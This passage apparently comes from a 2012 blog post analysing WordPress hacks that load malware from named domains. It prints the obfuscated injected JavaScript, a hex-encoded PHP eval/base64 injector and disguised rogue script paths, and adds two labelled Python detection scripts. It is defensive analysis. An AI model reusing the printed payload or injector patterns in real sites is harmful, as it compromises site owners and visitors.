Malware hosted on enema.at.tc/top2.html, onbent-goga.r.gd/top2.html, gemeni.info.ms/top2.html, gemenia-electric.r.gd/top2.html
31 May 2012
A large number of WordPress sites have turned up over the last few days with this JavaScript hack. The hack consists of a block of obfuscated script inserted into the <head></head> section of the site's pages. The hack is cloaked and does not show up every time a page from the site is requested. If you do not see the code with the File Viewer Tool, I suggest you try checking your homepage with Rex Swain HTTP Viewer. When visible, the block of code will look similar to this:
<scr ipt type='text/javascript'>st="en0no3mno 3nipno3rxinfopno3rxms";Date&&(a=["a#%d]%b@%e_%c)%1<%5*%4+%9:%3^%2","%7!%0|%f~%8?%6&"]);var b=[],c="&!^<^]$$&)&~&_&)!:$$^@$|&:&&$?$]^<^]^]&+&~&^!*&]&*&_!+$_&^&~&~&@&:&*$_&:&_&+&*!?+~&&$?&!^<$:$:!@!?^+^]^!^$+*^&^@!&&<!$$|&^^]&_&*!!$|++&<!+&*^@&^$_!^&*!+*+&:&]&*$?&^$_&!&*!+*+&:&]&*$?$:$:^@&*&+^]&_&*!!$|++&<!+&*$?&^$_&!&*!+*+&:&]&*$?$:$@!?^+$:^@&+&~&^!*&]&*&_!+$_&^&~&~&@&:&*^]&!^<$@$$^]$$$@&*!^&^&<!|&*$?&*&+$_!+&~+!+]*+*^!+!$&:&_&!$?$:$:$@$$^@&*!?!|&:!$&*!^^]$$$@&*&+$_!+&~+!+]*+*^!+!$&:&_&!$?$:$@$$^@!|&<!+&?^]$~$$^@&!^^^]$$&?!+!+!|^#$~$~$$$@!^!+$_!$&*!|&)&<&^&*$?$~&*&_^|$~&!$)$$&!$$$:$_!$&*!|&)&<&^&*$?$~&_&~^^$~&!$)$$&*$$$:$_!$&*! |&)&<&^&*$?$~!|&*!$!?$~&!$)$$$_$$$:$@$$$~!+&~!|^$$_&?!+&]&)$$^@!&&<!$$|&+^]$]^<$<^]&_&<!&&:&!&<!+&~!$$_!*!^&*!$+<&!&*&_!+$_!+&~+)&~!!&*!$+^&<!^&*$?$:$_&:&_&+&*!?+~&&$?$$&&&:!$&*&&&~!?$$$:$)&*^]$$^<$$$)&?^]&&!*&_&^!+&:&~&_$?$:!@!]^@&?$_!|!$&~!+&~!+!:!|&*^]!@&$^#&&!*&_&^!+&:&~&_$?$:!@!$&*!+!*!$&_$|&!^^!]$)&<^#&&!*&_&^!+&:&~&_$?$:!@!&&<!$$|&&^]&+&~&^!*&]&*&_!+$)&:^]!!&:&_&+&~!!$)&!^]!+&?&:!^^@!+!$!:!@!&*!^]$$&!&*!+!^&*!++<!+!+!$&:!^&+&&$$^@!&&<!$$|&<^]*@*]^@&+!)!)$?&*^]$$^|$$$:^@&<$_!|!*!^&?$?$$&?&*&:&!&?!+$$$)$$!^!*&$!^!+!$&:&_&!$$$)$$!+!$&*&^!$&*&<!+&*+*&)&*&]&*&_!+&!&*!+$$$)$$!!&:&+!+&?$$$)$|$$!&&$&]&:&&!$!^&*!+$$$)!&*!$)$$&$&~&+!:$$$)$$&<!|!|&*&_&++^&?&:&)&+$$$)&*$)&&$)$$!^!$&^$$$:^@!&&<!$$|&#^]&<*@^$*]*@&<*@^<*]*]$?^^$)^<^&$:^@!&+@^]&<*@^+*]*@&<*@^<*]*]$?^^$)^&$:$@$$&<&]&*$$^@!|^]&<*@^**]*@&<*@^<*]*]$?^^$)^<^<$:$@$$&$!*!+&*$$^@!&&<!$$|&@^]&!$_&$$?$:$)&$^]&<*@^:*]*@&#*]$?!&+@$:^@&$*@&<*@^<^|*]*]^]&@^@&$*@&<*@^^*]*]^]&<*@^?*]^@&$*@&<*@^|*]*]^]&<*@^?*]^@&<*@^:*]*@&<*@^&*]*]*@&<*@^!*]*]$?&$$:!]&^&<!+&^&?$?&]$:!@&&$_!!!$&:!+&*$?$$^)&?!+&]&)^_^)&$&~&+!:^_^)$~&$&~&+!:^_^)$~&?!+&]&)^_$$$:$)&:$_!^&*!+*+&:&]&*&~!*!+$?&&!*&_&^!+&:&~&_$?$:!@&!$_&<$?$:!]$)^$^^^^$:!]!]!]^@!&&<!$$|&)^]&_&*!!$|&?^@&:&&$?!!&:&_&+&~!!$_&_&<!&&:&!&<!+&~!$$_!*!^&*!$+<&!&*&_!+$_!+&~+)&~!!&*!$+^&<!^&*$?$:$_&]&<!+&^&?$?$~&&&:!$&*&&&~!?
!)&]!^&:&*$~&:$:$:!@&)$_&<$?$:^@!]$|&*&)!^&*$|!@$|&+&~&^!*&]&*&_!+$_&~&_&]&~!*!^&*&]&~!&&*^]&&!*&_&^!+&:&~&_$?$:!@&)$_&<$?$:^@&+&~&^!*&]&*&_!+$_&~&_&]&~!*!^&*&]&~!&&*^]&_!*&)&)!]!]!]^@"; function e(){e=a.join("$").split("%");for(var d in e)"string"==typeof e[d]&&(c=c.split(e[d].substr(1)).join(e[d].substr(0,1)));return this}var f=e(),a="";for(_E=~b-~b;_E<c.length/2;_E++)a+="%"+c.substr(2*_E,2);window.eval(f.decodeURIComponent(a));</sc ript>
The script is written into the page by a block of obfuscated PHP code hidden in one of the files on the site. The PHP code sets a cookie the first time a page on the site is visited, and the script will not be inserted if the cookie is detected. The page will trigger a malware warning the first time the site owner checks it, but when they check again there is no warning.
The PHP code will be similar to this:
$lqxizr = array(/* long list of short base64 string fragments */);
echo preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x75\x6E\x63\x6F\x6D\x70\x72\x65\x73\x73\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28\x69\x6D\x70\x6C\x6F\x64\x65\x28\x22\x22\x2C\x24\x6C\x71\x78\x69\x7A\x72\x29\x29\x29\x29\x3B",".");
I have only seen feedback from one site owner who indicated that the php code was placed in the file wp-includes/kses.php.
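Since the injector can sit in any PHP file (wp-includes/kses.php is only the one location reported above), here is a static check for the pattern shown: a preg_replace call with the /e modifier whose replacement string hides its code behind \x escapes. This is an added example, not code from the original post; the function names and the two-element array in the sample are constructed, and nothing from the scanned file is executed.

```python
import os
import re

# Calls typically chained to unpack a hidden payload before it is executed.
SUSPECT_CALLS = ("eval", "assert", "gzuncompress", "gzinflate",
                 "base64_decode", "str_rot13")

# preg_replace(<pattern literal>, <replacement literal>, ...
PREG_CALL = re.compile(
    r"""preg_replace\s*\(\s*
        (?P<q1>["'])(?P<pattern>(?:\\.|(?!(?P=q1))[^\\])*)(?P=q1)\s*,\s*
        (?P<q2>["'])(?P<repl>(?:\\.|(?!(?P=q2))[^\\])*)(?P=q2)""",
    re.VERBOSE | re.DOTALL | re.IGNORECASE,
)
# Escapes PHP expands inside double-quoted strings: \\, \xHH and octal \NNN.
PHP_ESCAPE = re.compile(r"\\(?:(\\)|x([0-9A-Fa-f]{1,2})|([0-7]{1,3}))")


def pcre_modifiers(pattern):
    """Return the modifier letters that follow the closing PCRE delimiter."""
    pattern = pattern.strip()
    if not pattern:
        return ""
    close = {"(": ")", "[": "]", "{": "}", "<": ">"}.get(pattern[0], pattern[0])
    end = pattern.rfind(close)
    return pattern[end + 1:] if end > 0 else ""


def decode_php_escapes(text):
    """Expand \\xHH / octal escapes the way PHP would, without running anything."""
    def expand(m):
        if m.group(1):
            return "\\"
        if m.group(2):
            return chr(int(m.group(2), 16))
        return chr(int(m.group(3), 8) & 0xFF)
    return PHP_ESCAPE.sub(expand, text)


def scan_php(source):
    """List every preg_replace call that uses /e, with its replacement decoded."""
    findings = []
    for m in PREG_CALL.finditer(source):
        if "e" not in pcre_modifiers(m.group("pattern")):
            continue
        raw = m.group("repl")
        decoded = decode_php_escapes(raw) if m.group("q2") == '"' else raw
        findings.append({
            "line": source.count("\n", 0, m.start()) + 1,
            "hidden": decoded != raw,   # True when escapes concealed the code
            "decoded": decoded,
            "calls": [c for c in SUSPECT_CALLS
                      if re.search(rf"\b{c}\s*\(", decoded, re.IGNORECASE)],
        })
    return findings


def scan_tree(root):
    """Run scan_php over every .php file below root; returns {path: findings}."""
    report = {}
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".php"):
                path = os.path.join(folder, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_php(fh.read())
                if hits:
                    report[path] = hits
    return report


# Constructed sample: the decoder call from the post plus one benign call.
SAMPLE = r'''<?php
$lqxizr = array("QUJD", "REVG");  // constructed stand-in for the fragment list
echo preg_replace("/.*/e", "\x65\x76\x61\x6C\x28\x67\x7A\x75\x6E\x63\x6F\x6D\x70\x72\x65\x73\x73\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28\x69\x6D\x70\x6C\x6F\x64\x65\x28\x22\x22\x2C\x24\x6C\x71\x78\x69\x7A\x72\x29\x29\x29\x29\x3B", ".");
$title = preg_replace("/\s+/", " ", $title);  // benign call, no /e modifier
'''

if __name__ == "__main__":
    for hit in scan_php(SAMPLE):
        print(hit["line"], hit["calls"], hit["decoded"])
```

The /e modifier was deprecated in PHP 5.5 and removed in PHP 7, so on a current site any hit is worth reading by hand.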
Malware hosted on adsa.fr.pn, holala02.in, adsa.cn.pn, piz04.edu.tf, adsa.co.at.pn and topddd14.in
I am seeing a number of WordPress sites hacked with a script call to a "rogue" php file over the last couple of days. The hacks have all been fairly similar. The hacker places a "rogue" php file on the site that, in most cases, has contained some obfuscated JavaScript that writes an iframe which loads the malicious content. In one case the "rogue" file contained some obfuscated php code which wrote some obfuscated JavaScript which wrote the iframe. Next the hacker inserts a script call in all the index.php file(s) on the site to call the "rogue" php file. In most cases the script call was inserted at the end of the file just before the </body> tag, but on one site it was towards the beginning of the file just after the <body> tag. Here are some of the paths/file-names I have seen used:
<script type="text/javascript" src= "/wp-includes/js/tinymce/plugins/wplink/img/noosfera.php">
<script type="text/javascript" src="/wp-includes/js/tinymce/plugins/wpdialogs/js/input.php">
<script type="text/javascript" src="/wordpress/wp-content/plugins/nextgen-gallery/admin/js/colorpicker/js/graublau.php">
<script type="text/javascript" src="/wp-content/themes/choco/images/colors/LITBox.php">
<ems><script type="text/javascript" src="/tinymce/jscripts/tiny_mce/plugins/advimage/jscripts/qtp_library.php"></script></ems>
<dig><script type="text/javascript" src="/wp-content/plugins/growmap-anti-spambot-plugin/languages/horizmenu.php"> </script></dig>
<dig><script type="text/javascript" src="/wp-content/themes/metrolo/images/prettyPhoto/dark_rounded/index_jquery.php"></script></dig>
<ems><script type="text/javascript" src="/wp-includes/js/tinymce/plugins/spellchecker/checkuncheckboxes.php"></script></ems>
<ad><script type="text/javascript" src="/wp-content/themes/suitandtie/styles/gray/png.php"></script></ad>
<script type="text/javascript" src="/wp-includes/js/swfupload/plugins/laser.php">
<cits> <script type="text/javascript" src="/wp-includes/js/tinymce/themes/advanced/skins/o2k7/jquery.masonry.php"> </script></cits>
<script type="text/javascript" src="/wp-content/plugins/sitemap-generator/lang/page.php"></script>
<centr> <script type="text/javascript" src="/wp-content/element-beta-min.php"> </script> </centr>
<block> <script type="text/javascript" src="/wp-content/plugins/nextgen-gallery/admin/js/colorpicker/css/jquery-ui-accordion.min.php"> </ script> </block>
In some cases the script calls were enclosed in tags such as <ems></ems>, <ad></ad>, <dig></dig>, <cits></cits>, and in others not. The paths/file-names could be just about anything and so far have been "tweaked" to fit the plugins/themes used on the site to help disguise them.
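Because the file names change from site to site, the stable thing to look for is the shape of the call: a script tag whose src is a site-local .php file, sometimes wrapped in a made-up element. The check below is an added example, not code from the original post; the allowlist, the set of usual parent elements and the sample page are assumptions to adjust per site (the two flagged paths in the sample are taken from the list above).

```python
import re
from urllib.parse import urlsplit

# <script ... src="..."> with either quote style; the src value is captured.
SCRIPT_TAG = re.compile(
    r"""<\s*script\b[^>]*?\bsrc\s*=\s*(["'])(?P<src>.*?)\1[^>]*>""",
    re.IGNORECASE | re.DOTALL,
)
# An attribute-less opening tag sitting directly in front of the script tag.
WRAPPER_OPEN = re.compile(r"<\s*([a-z][a-z0-9]*)\s*>\s*$", re.IGNORECASE)

# Assumption: PHP endpoints that legitimately serve JavaScript on this site.
ALLOWED_PHP_SCRIPTS = {"/wp-admin/load-scripts.php"}
# Assumption: elements that normally hold a script tag; others are reported.
USUAL_PARENTS = {"html", "head", "body", "div", "footer", "header",
                 "section", "main"}


def find_php_script_calls(html, allowed=ALLOWED_PHP_SCRIPTS):
    """Return script tags whose src is a site-local .php file not in `allowed`."""
    findings = []
    for m in SCRIPT_TAG.finditer(html):
        src = m.group("src").strip()
        url = urlsplit(src)
        if url.scheme or url.netloc:
            continue                      # remote script: a different check
        if not url.path.lower().endswith(".php") or url.path in allowed:
            continue
        wrapper = None
        before = WRAPPER_OPEN.search(html, 0, m.start())
        if before and before.group(1).lower() not in USUAL_PARENTS:
            wrapper = before.group(1).lower()   # e.g. <ems>, <dig>, <cits>
        findings.append({
            "line": html.count("\n", 0, m.start()) + 1,
            "src": src,
            "wrapper": wrapper,
        })
    return findings


# Constructed page: two normal script tags and two calls of the kind listed above.
SAMPLE_PAGE = """<html><head>
<script type="text/javascript" src="/wp-includes/js/jquery/jquery.js"></script>
<script type="text/javascript" src="/wp-admin/load-scripts.php?c=1&load=jquery"></script>
</head><body>
<p>Hello</p>
<ems><script type="text/javascript" src="/tinymce/jscripts/tiny_mce/plugins/advimage/jscripts/qtp_library.php"></script></ems>
<script type="text/javascript" src="/wp-includes/js/swfupload/plugins/laser.php"></script>
</body></html>
"""

if __name__ == "__main__":
    for hit in find_php_script_calls(SAMPLE_PAGE):
        print(hit["line"], hit["wrapper"], hit["src"])
```

Run it over the source of each index.php and over the rendered page as well, since the call only has to appear in one of them to reach visitors.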
On some sites, not all, there is also a hack in one or more of the JavaScript files. For example on one site the script /wp-content/themes/
document.write("\u003C\u0073\u0063\u0072\u0069\u0070\u0074\u002...........u0070\u0074\u003E");
If you view your JavaScript files in the File Viewer it "SHOULD" de-obfuscate the line. The script wrote the line of code